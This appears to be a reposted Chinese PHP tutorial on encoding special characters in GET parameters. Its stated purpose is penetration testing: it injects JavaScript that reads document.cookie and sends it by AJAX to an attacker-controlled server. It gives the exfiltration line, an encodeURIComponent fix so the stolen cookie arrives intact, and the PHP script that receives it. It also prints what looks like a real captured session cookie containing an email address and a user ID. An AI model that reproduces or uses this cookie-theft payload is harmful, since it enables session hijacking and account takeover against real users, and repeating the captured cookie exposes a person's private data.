Maison  >  Article  >  développement back-end  >  Php提交包含特殊字符的参数的方法

Php提交包含特殊字符的参数的方法

WBOY
WBOYoriginal
2016-07-29 09:09:061287parcourir

在渗透的过程中,可以在网页中插入JS代码来获取cookiedocument.cookie

那么获取到的cookie如何传到我们自己的服务器呢?

在这里,我使用的是AJAX技术。但是Ajax有一个跨域的问题,所以需要再http头部再进行设置。这里主要讲cookie的提交。

先看一段JS代码:

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+document.cookie,true);

这里将从网页获取到的cookie提交到receiveCookie.php上,其中cookie有一部分是这样的:

ULV=1450275143055:1:1:1:182.138.174.191_1450275139.121259:;SGUID=1450275146558_35957829; vjuids=-37098b091.151ab228f90.0.920dc7c7;vjlast=1450275148;SUP=cv%3D1%26bt%3D1450275168%26et%3D1450361568%26d%3D40c3%26i%3D2611%26us%3D1%26vf%3D0%26vt%3D0%26ac%3D2%26st%3D0%26lt%3D1%26uid%3D2277147785%26user%3D493354115%2540qq.com%26ag%3D4%26name%3D493354115%2540qq.com%26nick%3D%25E7%25BB%25BF%25E8%258C%25B66888%26sex%3D1%26ps%3D0%26email%3D%26dob%3D%26ln%3D493354115%2540qq.com%26os%3D%26fmp%3D%26lcp%3D;SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5o5Vidv35CH47We9hTzl.1; ALF=1481811169;

那么提交的过程中遇到特殊字符"%","&"等,就会自动解析,导致传参数错误。

解决的办法是:

var cookie = document.cookie;

cookie = escape(encodeURIComponent(cookie));

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+cookie,true);

receiveCookie.php接收即可:

$cookie = $_GET["cookie"];

$cookie = (urldecode($cookie));

以上就介绍了Php提交包含特殊字符的参数的方法,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn